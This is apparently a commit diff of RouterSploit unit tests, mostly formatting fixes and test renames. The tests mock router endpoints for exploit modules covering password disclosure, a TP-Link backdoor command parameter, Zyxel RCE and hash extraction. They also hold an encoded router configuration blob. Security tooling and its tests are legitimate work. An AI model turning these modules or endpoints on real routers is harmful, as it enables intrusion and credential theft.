AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAc3lzIGZlYXR1cmUgdHIwNjkgMQpzeXMgZXJyY3RsIDANCnN5cyB0cmNsIGxldmVsIDUNCnN5cyB0cmNsIHR5cGUgMTE4MA0Kc3lzIHRyY3AgY3IgNjQgOTYNCnN5cyB0cmNsIHN3IG9mZgpzeXMgdHJjcCBzdyBvZmYKaXAgdGNwIG1zcyA1MTINCmlwIHRjcCBsaW1pdCAyDQppcCB0Y3AgaXJ0dCA2NTAwMA0KaXAgdGNwIHdpbmRvdyAyDQppcCB0Y3AgY2VpbGluZyA2MDAwDQppcCByaXAgYWN0aXZhdGUNCmlwIHJpcCBtZXJnZSBvbg0KaXAgaWNtcCBkaXNjb3ZlcnkgZW5pZjAgb2ZmCnBwcCBpcGNwIGNvbXByZXNzIG9mZgpzeXMgd2RvZyBzdyBvbgpzeXMgcXVpY2sgZW5hYmxlCndhbiBhZHNsIHJhdGUgb2ZmCmYKZQp3YW4gYWRzbCByYXRlIG9mZgoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//w==")
def test_check_success(target):
""" Test scenario - successful check """
......
tests/exploits/routers/technicolor/test_tc7200_password_disclosure_v2.py
......@@ -5,8 +5,11 @@ from routersploit.modules.exploits.routers.technicolor.tc7200_password_disclosur
def test_check_success(target):
""" Test scenario - successful exploitation """
encrypted_mock = binascii.unhexlify('F29000B62A499FD0A9F39A6ADD2E7780' # encrypted zero block + data from https://www.exploit-db.com/exploits/31894/
+'c07fdfca294e1a4e4b74dbb2ffb7d2a73a90f00111134dc8d9810a90f2a9bf5862a179a20a9418a486bd4c8170730c8f')
encrypted_mock = binascii.unhexlify(
"F29000B62A499FD0A9F39A6ADD2E7780" # encrypted zero block + data from https://www.exploit-db.com/exploits/31894/
"c07fdfca294e1a4e4b74dbb2ffb7d2a73a90f00111134dc8d9810a90f2a9bf5862a179a20a9418a486bd4c8170730c8f"
)
route_mock = target.get_route_mock("/goform/system/GatewaySettings.bin", methods=["GET"])
route_mock.return_value = (
encrypted_mock
......
tests/exploits/routers/thomson/test_twg850_password_disclosure.py
......@@ -2,7 +2,7 @@ from routersploit.modules.exploits.routers.thomson.twg850_password_disclosure im
def test_exploit_success(target):
""" Test scenario - successful exploitation """
""" Test scenario - successful exploitation """
route_mock = target.get_route_mock("/GatewaySettings.bin", methods=["GET"])
route_mock.return_value = (
......
tests/exploits/routers/tplink/test_wdr740nd_wdr740n_backdoor.py
......@@ -5,7 +5,7 @@ from routersploit.modules.exploits.routers.tplink.wdr740nd_wdr740n_backdoor impo
def apply_response(*args, **kwargs):
cmd = request.args["cmd"]
data = 'TEST; var cmdResult = new Array(\n"'+cmd+'",\n0,0 ); TEST'
data = 'TEST; var cmdResult = new Array(\n"' + cmd + '",\n0,0 ); TEST'
return data, 200
......
tests/exploits/routers/zyxel/test_d1000_rce.py
from unittest import mock
from flask import Response
from flask import Response
from routersploit.modules.exploits.routers.zyxel.d1000_rce import Exploit
......
tests/exploits/routers/zyxel/test_d1000_wifi_password_disclosure.py
......@@ -11,7 +11,6 @@ def test_check_success(target):
"TEST"
)
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
......
tests/exploits/routers/zyxel/test_p660hn_t_v1_rce.py
......@@ -13,7 +13,6 @@ def test_check_success(mocked_shell, target):
"TEST"
)
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
......
tests/exploits/routers/zyxel/test_p660hn_t_v2_rce.py
......@@ -13,7 +13,6 @@ def test_check_success(mocked_shell, target):
"TEST"
)
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
......
tests/exploits/routers/zyxel/test_zywall_usg_extract_hashes.py
......@@ -11,7 +11,6 @@ def test_check_success(target):
"TEST\n"
)
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
......
tests/test_exploit_scenarios.py
......@@ -33,7 +33,7 @@ def test_exploit_not_found_response(not_found_target, module):
@pytest.mark.parametrize("module", iter_modules(directory))
def test_exploit_empty_response(error_target, module):
def test_exploit_error_response(error_target, module):
exploit = module()
exploit.target = error_target.host
exploit.port = error_target.port
......@@ -42,7 +42,7 @@ def test_exploit_empty_response(error_target, module):
@pytest.mark.parametrize("module", iter_modules(directory))
def test_exploit_empty_response(redirect_target, module):
def test_exploit_redirect_response(redirect_target, module):
exploit = module()
exploit.target = redirect_target.host
exploit.port = redirect_target.port
......
tests/test_module_info.py
......@@ -11,7 +11,7 @@ def test_exploit_info(exploit):
assert "name" in info
assert isinstance(info["name"], str)
assert "description" in info
assert "description" in info
assert isinstance(info["description"], str)
assert "authors" in info
......@@ -25,7 +25,7 @@ def test_exploit_info(exploit):
@pytest.mark.parametrize("creds", iter_modules("./routersploit/modules/creds"))
def test_exploit_info(creds):
def test_creds_info(creds):
info = creds._Exploit__info__
assert isinstance(info, dict)
......@@ -33,7 +33,7 @@ def test_exploit_info(creds):
assert "name" in info
assert isinstance(info["name"], str)
assert "description" in info
assert "description" in info
assert isinstance(info["description"], str)
assert "authors" in info
......@@ -44,7 +44,7 @@ def test_exploit_info(creds):
@pytest.mark.parametrize("scanner", iter_modules("./routersploit/modules/scanners"))
def test_exploit_info(scanner):
def test_scanner_info(scanner):
info = scanner._Exploit__info__
assert isinstance(info, dict)
......@@ -52,7 +52,7 @@ def test_exploit_info(scanner):
assert "name" in info
assert isinstance(info["name"], str)
assert "description" in info
assert "description" in info
assert isinstance(info["description"], str)
assert "authors" in info
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment